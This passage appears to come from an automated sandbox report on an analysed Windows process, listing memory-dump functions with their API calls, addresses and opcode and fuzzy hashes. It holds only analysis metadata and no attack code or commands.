Instruction ID: 19cc0ca479f6f2d5a9ba11b73d7f623136ca4fe0c6bf5047e244eb68fe81db2b
Opcode Fuzzy Hash: 3b971ac5308624bb11b8d899c101bb008c369c73f6e08693b143b82e6771f851
Instruction Fuzzy Hash: A251C0B1D00209EFDF15CF99C880ADEBBB6FF88310F24852AE919AB250D7709945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A01498, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A015A1

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6a5f0f08162642f3e6f074caa455b19cebaf41e0d735f97010cfbfdbf188d606
Instruction ID: a7e5b02f3e4c93646f83c02fa38a14639254395377bc13ac534e4fc0b3266fd2
Opcode Fuzzy Hash: 6a5f0f08162642f3e6f074caa455b19cebaf41e0d735f97010cfbfdbf188d606
Instruction Fuzzy Hash: 47414CB1E042489FCB10CFA9D884ADEBFF5BF88704F14846AE819AB351D774A905CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1DA367F8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DA3690A

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f953886d1835de57c59ec805ca8a9db5b916bf0adf94d9d44718dcd62501ca62
Instruction ID: 525583c3187abdd21fa10270259c74c46cc130aba8bbe2cf78b3e0e7d196215f
Opcode Fuzzy Hash: f953886d1835de57c59ec805ca8a9db5b916bf0adf94d9d44718dcd62501ca62
Instruction Fuzzy Hash: 9A41C0B1D00309AFDF14CF99C880ADEBBB6BF48310F24852AE919AB210D771A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B0C1C9, Relevance: 1.6, APIs: 1, Instructions: 105threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-D7C6EBD9,60AC095E), ref: 00B0C29B

Memory Dump Source

Source File: 0000000B.00000002.5670771158.0000000000B0C000.00000040.00000001.sdmp, Offset: 00B0C000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 98c39160c99f5792dc95093693b8ed3a6da2d5a528d40bf2c9dda60ea419785e
Instruction ID: ba1bf0c8c505e5ff65d39f6a4e0fd647a26d780846059b9ec96d1c30008ea3b9
Opcode Fuzzy Hash: 98c39160c99f5792dc95093693b8ed3a6da2d5a528d40bf2c9dda60ea419785e
Instruction Fuzzy Hash: D831C071504351CECB658F64C4A9BAA7FE1FF51320F5A83EAC8498B6A2D33489C5C742

Uniqueness

Uniqueness Score: -1.00%

Function 1DA3A144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1DA3B4E1

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: dc56ba261722aa8f4aee11d6390e538e663f4dbab112e55f0981c867358529aa
Instruction ID: 76a4210d1d4c053fcb709a2592495c16f077dddc2374e42e03f28457859432ce
Opcode Fuzzy Hash: dc56ba261722aa8f4aee11d6390e538e663f4dbab112e55f0981c867358529aa
Instruction Fuzzy Hash: B2412AB89003099FCB10CF95C444AAAFBF6FF89314F24C859D519AB321D775A841CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A00B40, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A015A1

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: fa60fb941a948c0aa69af9466ed374ae3ff0f0407c1c5a5381767131094788c3
Instruction ID: fdc73d47ef5ab98511a305fc65909bfae55936926f9b75bed7dcd74d33f81075
Opcode Fuzzy Hash: fa60fb941a948c0aa69af9466ed374ae3ff0f0407c1c5a5381767131094788c3
Instruction Fuzzy Hash: 9031E0B1D0025C9FCB20CF99D884ADEBBF5BF88314F14842AE819AB350D770A905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B0C1DC, Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-D7C6EBD9,60AC095E), ref: 00B0C29B

Memory Dump Source

Source File: 0000000B.00000002.5670771158.0000000000B0C000.00000040.00000001.sdmp, Offset: 00B0C000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 9a200eebc40256e7452899c19fd9d59bdd7f65ebaa65d212f6987158e7824c26
Instruction ID: 4137d4460c56a552328d118a0464b2d2bc912bca995f3f85096c082033c9bc81
Opcode Fuzzy Hash: 9a200eebc40256e7452899c19fd9d59bdd7f65ebaa65d212f6987158e7824c26
Instruction Fuzzy Hash: AC318B30504356CEDB258F64C4E9BAA7FE1FF45324F5A83EAC8494B6E2D7348985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00A070E4, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A07141

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87eab7f147cba685a3f8dcdb18821524462c73faa7963b5bae8875b1225664c0
Instruction ID: f8fb1acea555db9b4b291e757731985ccd7aa44d36d48b0ddc0218d629cbdb61
Opcode Fuzzy Hash: 87eab7f147cba685a3f8dcdb18821524462c73faa7963b5bae8875b1225664c0
Instruction Fuzzy Hash: E021A130E08218EFDB09DFA4D885ADEBBB2FF85305F108479D800AB291DB35A845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DA3A54B, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DA3A5D7

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: af844e4e7be41c56b605aa7a994edd19b1b8457973833fdffd62075e75e8d4b6
Instruction ID: 06f3312e25dbc200636a9b77c35b4423881fe7015e091a2cb9e5eb9a0c305334
Opcode Fuzzy Hash: af844e4e7be41c56b605aa7a994edd19b1b8457973833fdffd62075e75e8d4b6
Instruction Fuzzy Hash: 9821F2B5D00248AFCB00CFA9D880ADEBBF9EF48320F10841AE915A7311D374A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DA3A550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DA3A5D7

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7e632d93c74f96cf4cc976445c7ae20805bb6143622e81a476a5307e0ea9c4a2
Instruction ID: c3a7bfd93e80179898e6e3d566859b6dbc9cfbbf80d099ee8c544a8d129a98de
Opcode Fuzzy Hash: 7e632d93c74f96cf4cc976445c7ae20805bb6143622e81a476a5307e0ea9c4a2
Instruction Fuzzy Hash: C021E3B5D00248AFDB10CFA9D880ADEBBF9EB48320F10841AE915A7351D374A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F739, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 00A0F7B6

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 61f3741d175070212e6038fb9b5c430b65b29bdc99f927ee705c1b66dd8fc4c3
Instruction ID: 649e2dbb944675639395ab5ff0ad5ce33f0e9f730629b7002c8b8b12b006d3b1
Opcode Fuzzy Hash: 61f3741d175070212e6038fb9b5c430b65b29bdc99f927ee705c1b66dd8fc4c3
Instruction Fuzzy Hash: F02113B98002098FCB24CF9AD484ADEFBF4FF89314F10896ED519B7641C374A505CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A0E204, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 00A0F7B6

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: cf9fb314742c035c7b3f7fc62636fa22a667955417ec54135fd1864e8422d327
Instruction ID: 3f7c2eb269f12e1e2965e9f1cea6d7113e352099ecca9e69870a5643b78c3746
Opcode Fuzzy Hash: cf9fb314742c035c7b3f7fc62636fa22a667955417ec54135fd1864e8422d327
Instruction Fuzzy Hash: E22113B59002098FCB24CF9AD484ADEFBF4BF89310F10852ED419B7641C374A905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2AA8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00AC2A89,00000800), ref: 00AC2B1A

Memory Dump Source

Source File: 0000000B.00000002.5670153967.0000000000AC0000.00000040.00000010.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 210759add82af3a8c711ac35c7fdc3c177b388168cf94088f905f22e96819e2f
Instruction ID: 353589baaa6ceaafbeb6da85ab3ebd25ca2ce6aa9f1a6c7bd983db658a2692cd
Opcode Fuzzy Hash: 210759add82af3a8c711ac35c7fdc3c177b388168cf94088f905f22e96819e2f
Instruction Fuzzy Hash: 3E1124B6D002488ECB10CFA9C844BDEFBF4AB89350F10892ED415A7201C375A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1D54, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00AC2A89,00000800), ref: 00AC2B1A

Memory Dump Source

Source File: 0000000B.00000002.5670153967.0000000000AC0000.00000040.00000010.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b2c4744f09175379ecea1029d5172b5a5911534caaa152735a741f94e162653b
Instruction ID: a83a84523225fcbd93ce05e668c432dd57340b1e3824c2cbaabf7c9218fbb094
Opcode Fuzzy Hash: b2c4744f09175379ecea1029d5172b5a5911534caaa152735a741f94e162653b
Instruction Fuzzy Hash: 0F1103B6D002498FCB20CF9AD444BDEFBF8AB89350F14882ED915A7701C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A00E8C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00A09E62), ref: 00A09F4F

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ed6408ffe8e09f822107f1daccd428dead2ab4bb2496fe3115d782755a1a3ef3
Instruction ID: 5efd3fe75252cc7f17e12014f980ed910060ad31e3950ab0ae038907261342a4
Opcode Fuzzy Hash: ed6408ffe8e09f822107f1daccd428dead2ab4bb2496fe3115d782755a1a3ef3
Instruction Fuzzy Hash: 881103B1D0061A9BCB10CF9AD4457EEFBF8AF48324F10856AD918B7241D378A950CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 1DA35349, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DA353B6

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e30271b342493308e72d10c26d030c09e8f8810f011f656680eb0eb7ed70333d
Instruction ID: 473116ccce98be11c6cdcd56a65d9b92b493de8daa8f160c7b355939bb12cb00
Opcode Fuzzy Hash: e30271b342493308e72d10c26d030c09e8f8810f011f656680eb0eb7ed70333d
Instruction Fuzzy Hash: 8911EFB5D006499FCB14CF9AD440ADEFBF9AF89320F10881AD859A7601D3B9A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DA337C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DA353B6

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3a26af14513230791655527b4f1b1ddb43104e5abc788175177643747b449307
Instruction ID: 14ef2b77d0f033bb791f9503188b2644bccd59ce0e20cc21ae02fdb9a8e24c72
Opcode Fuzzy Hash: 3a26af14513230791655527b4f1b1ddb43104e5abc788175177643747b449307
Instruction Fuzzy Hash: 31111FB5C006099FCB10CF9AC444BDEFBF5AB89220F10881AD959A7301C3B9A505CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5960, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00AC67C5

Memory Dump Source

Source File: 0000000B.00000002.5670153967.0000000000AC0000.00000040.00000010.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 986e88a6eded06bc9de9b3d1dfa305134a0e62e82cb9058b2a62db91c5e3eb74
Instruction ID: f1be5da5266d1ef544025d9a77852d5b8b3e7a19a4ed9cfd74c487a45f1a59f5
Opcode Fuzzy Hash: 986e88a6eded06bc9de9b3d1dfa305134a0e62e82cb9058b2a62db91c5e3eb74
Instruction Fuzzy Hash: 701145B09002488FCB10CF99C448BDEFFF8EB48324F208859D518A7701C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6768, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00AC67C5

Memory Dump Source

Source File: 0000000B.00000002.5670153967.0000000000AC0000.00000040.00000010.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9331053a8e1a3651f15f913087041e71292068058fba72bd057971af7ddc511c
Instruction ID: 76e73ab1c1150be3c6d6fa44dd791e83723e7914c4d93cd0d2489bd624d4368e
Opcode Fuzzy Hash: 9331053a8e1a3651f15f913087041e71292068058fba72bd057971af7ddc511c
Instruction Fuzzy Hash: 401103B5D006488FCB10CFA9D585BDEBBF8EB49324F20885AD559A7710C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFD3D0, Relevance: .9, Instructions: 869COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff9996ee042d983766ea34b37515e59ea57982e813f43d3201ec51661142de3
Instruction ID: 87f2607724917faf092b343b1ec21af722c6dc0d77c62ec1ff56183142d09fe2
Opcode Fuzzy Hash: 6ff9996ee042d983766ea34b37515e59ea57982e813f43d3201ec51661142de3
Instruction Fuzzy Hash: F452F470F0420D8BDB149BB8D8846BDBBB3EF95350F2A8466E605DB395DA34DC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF6C10, Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9cd60c17d0a1187079f9cdbf3af1e33e36bb6e147e7b24ee85852950f1df720
Instruction ID: d0c32730c9cafc75231fda2f09320c9507e86d43f12be4f56b7e8aa0dee21dcd
Opcode Fuzzy Hash: e9cd60c17d0a1187079f9cdbf3af1e33e36bb6e147e7b24ee85852950f1df720
Instruction Fuzzy Hash: EAF1B03030820A8FDB259B38D85477976A6EF81744F2EC0AAF746CF7A1DA25CC41C762

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4E94, Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d5c1499e9539bf497524c3805bfd406a3ee3b68643185429eb010f0c8eab0d
Instruction ID: 0e96380ae2cc117cb658f78bf478a1dcc1b9e68a64e2e4d3a5501ac683e02af9
Opcode Fuzzy Hash: 83d5c1499e9539bf497524c3805bfd406a3ee3b68643185429eb010f0c8eab0d
Instruction Fuzzy Hash: C6D19130A006198FCB14DBB8D9846BDB7F2EF89355F298469E606DB354DB31EC41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DFD883, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a973e3e2397d629a68e9344f89844387bb134f39923b86e7dd4cb3302ac3c9aa
Instruction ID: eb4727ae986d444ed85490ede9605484de0c06ef077644d387550e0255e27d3f
Opcode Fuzzy Hash: a973e3e2397d629a68e9344f89844387bb134f39923b86e7dd4cb3302ac3c9aa
Instruction Fuzzy Hash: 9B91D930F0410D4BDF214AA8D89077D77A79BA6311F2B8827E645EF395CA65DC4187B2

Uniqueness

Uniqueness Score: -1.00%

Function 00DF7A60, Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae5272223209b436f992c7317af636855885e47bd37ba846d1bdcea8ed9bb67
Instruction ID: 3987c500426c75f5472b01e8420a41bb7fb5a504c96c1bbaf5c2136ceb6f8ad1
Opcode Fuzzy Hash: dae5272223209b436f992c7317af636855885e47bd37ba846d1bdcea8ed9bb67
Instruction Fuzzy Hash: 8091DC347042199FDB05DFA4C894BBE7BA6AF89300F19C46CE6199F390DB31DD018BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DF64B8, Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8931d376b91dba62383cbfad3300be866253bb3ac51f0b7a07d949ffe997a6fa
Instruction ID: 4872fa3b526d64bfd6ef208d27739ba0e766be2c0f1240b8414aad57418ce21e
Opcode Fuzzy Hash: 8931d376b91dba62383cbfad3300be866253bb3ac51f0b7a07d949ffe997a6fa
Instruction Fuzzy Hash: 4EA15B347042498FCB15DF78C894A797BF5AF89304B1A80EAEA05CB7A2DB75DC41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DF6860, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4c12d7d9b00ce1df9a0ca33709f38401625b9b0f6849a763594429d709e8d8
Instruction ID: 51463eb00f6e5619866d4bd6b5210608c4aaa3f9eb9ad177615cb18ca57f116f
Opcode Fuzzy Hash: ed4c12d7d9b00ce1df9a0ca33709f38401625b9b0f6849a763594429d709e8d8
Instruction Fuzzy Hash: DBA1AE30A0424D9FCF05CFA4C854AEDBFB2FF89310F19815AE915AB261D771E955CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DF5838, Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ac7818e5c3494cc8151833d9be04c984ef35196e13d2897c7597c14ee8c854
Instruction ID: ed8c066baedc5b6fe1cb4b1371cdec85b01935feaf106c53bc43d3f1aa18dc25
Opcode Fuzzy Hash: e5ac7818e5c3494cc8151833d9be04c984ef35196e13d2897c7597c14ee8c854
Instruction Fuzzy Hash: 89818F34B046198FCB49ABB4C45877E76F6AFC8345F158529E606DB384EF349C028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF5858, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1219989d2db34e14dcc26086387a11a9841d48710493028246b93ca6c5a2cf
Instruction ID: cd1398c1c3358dc567528a9b328d95f52e14c00d72b5e225ccfa9ffe80e96c8f
Opcode Fuzzy Hash: 9f1219989d2db34e14dcc26086387a11a9841d48710493028246b93ca6c5a2cf
Instruction Fuzzy Hash: 6971B034B042198FCB48ABB4D45877E76F7AFC8345F158928E606DB384EF749C028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF578, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25c217a22c879e07a73ae66ff5f57f75f405194e6ce55e5cd96b90d2aa22079
Instruction ID: 4545d5738b828bfb1af95d90af1ee3d2f7a1b8dcd1e86c2ae1c3e64e565ffa45
Opcode Fuzzy Hash: b25c217a22c879e07a73ae66ff5f57f75f405194e6ce55e5cd96b90d2aa22079
Instruction Fuzzy Hash: B751F031B056189FDB109B78C45477DB7A2EF89304F2A85B9DA59DB3B1DF309C018BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DF51E8, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b85e06c9c06931afa95e7baadb5d933af3b57a8126ebbd2471e8d14e8270e46
Instruction ID: 0bbbfd9b22123d8d1ea5d193fc9fea14068abe2b1af582be9b63475e62c39c0f
Opcode Fuzzy Hash: 0b85e06c9c06931afa95e7baadb5d933af3b57a8126ebbd2471e8d14e8270e46
Instruction Fuzzy Hash: 5551D931B0460E4FDF2486B8E98077E77A2EB86345F26883AD705DB285DB35ED418762

Uniqueness

Uniqueness Score: -1.00%

Function 00DF71D0, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7fa17b23c01030bbc63290f091cc252dec3e8c56bec7574be89ae8e6040542
Instruction ID: d14c329ba8c746e30c5ca6621723a38e920a55ae9fcb32a9a329459757ef32fa
Opcode Fuzzy Hash: 6f7fa17b23c01030bbc63290f091cc252dec3e8c56bec7574be89ae8e6040542
Instruction Fuzzy Hash: 88618D70E0834D9FDB15CFA5C440AEDBBF2AF89304F2A8219E915AB241D770AD45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DF71C1, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e13b1fb859666a20dce7e57ed96406bf5e787a2e900dc42a371393bca0ce35d5
Instruction ID: 1041cef7369c20e3830d4f032324682f0482f9fdcf97a2ee70e301ffabe5b375
Opcode Fuzzy Hash: e13b1fb859666a20dce7e57ed96406bf5e787a2e900dc42a371393bca0ce35d5
Instruction Fuzzy Hash: C9517D70E0874D9FDB15CFA5C4406EDBBF2AF89304F2A825AE955AB241D370AD85DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00DF5B49, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b5c7dced0a854dc21c568da1fc5aafb72d41d6d85568461619883d2ab2d2c8
Instruction ID: 2eece76574b355a3825d65458e3c88bf5c750513a0062d89a1b5fb068f17cdc6
Opcode Fuzzy Hash: 63b5c7dced0a854dc21c568da1fc5aafb72d41d6d85568461619883d2ab2d2c8
Instruction Fuzzy Hash: 0241B334B042198FDB58AB74D45877E77F6AF88741F158529E606DB388EF709C02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF96F, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5999b39be1b42138e8674fced6fb130606fde9ee9af8327cf3df2e194cd6a82a
Instruction ID: 30ef277f76ca94642b1161a68097ba85861635d3c7fc72a38a6fb5c973d4cbb2
Opcode Fuzzy Hash: 5999b39be1b42138e8674fced6fb130606fde9ee9af8327cf3df2e194cd6a82a
Instruction Fuzzy Hash: 0851F434E2132D9FCB01DFE8DAD489DBBB5BF48701B5089A5D901AB324EB346A05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF970, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96cae8c56fdc7c37470ee3fb00dd6b8746f912e5368cb8170603642be7ca81dd
Instruction ID: a7ddb16ae84af3070496e0539fdf9c269ccc2134ec65f594699eeda4c9ea54b0
Opcode Fuzzy Hash: 96cae8c56fdc7c37470ee3fb00dd6b8746f912e5368cb8170603642be7ca81dd
Instruction Fuzzy Hash: 3B51E434E2132D9FCB01DFE8DAD499DBBB5BF48701B5089A5D901AB324EB346A05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00DF69B3, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa11b8db251c801c5db4a3a3c1ff4d56f38a6da356f4e45836580bc2cc94c76e
Instruction ID: cf7f69e7891084c26b1f3646800630290ab4216d0a5ec452c79b8a70bb3a5bbe
Opcode Fuzzy Hash: aa11b8db251c801c5db4a3a3c1ff4d56f38a6da356f4e45836580bc2cc94c76e
Instruction Fuzzy Hash: A141A031A0424D9FCF01CFA4C894AAEBFB1EF45350F19C056EA45EB6A1D371E914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DFA90D, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae735b855948bac5fb40393ef9a8b64979f4647da25111e53b47b52866ce19ad
Instruction ID: 0bf10d6515a8e4f168e8856ca7f315e86c40f40a7a30fd78a669dc529f55a3b6
Opcode Fuzzy Hash: ae735b855948bac5fb40393ef9a8b64979f4647da25111e53b47b52866ce19ad
Instruction Fuzzy Hash: 8041D170E002198FDB645BA884183BDBAB6AF88310F15C46ED25ADB380CF704C44CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF2D4, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f102e692ed80741a568f53090095b97894f38cb79acbffea7adec5be766db090
Instruction ID: 94e212204618a593571b05658a3d928e5a82147119eafdf5c363de520cb21d71
Opcode Fuzzy Hash: f102e692ed80741a568f53090095b97894f38cb79acbffea7adec5be766db090
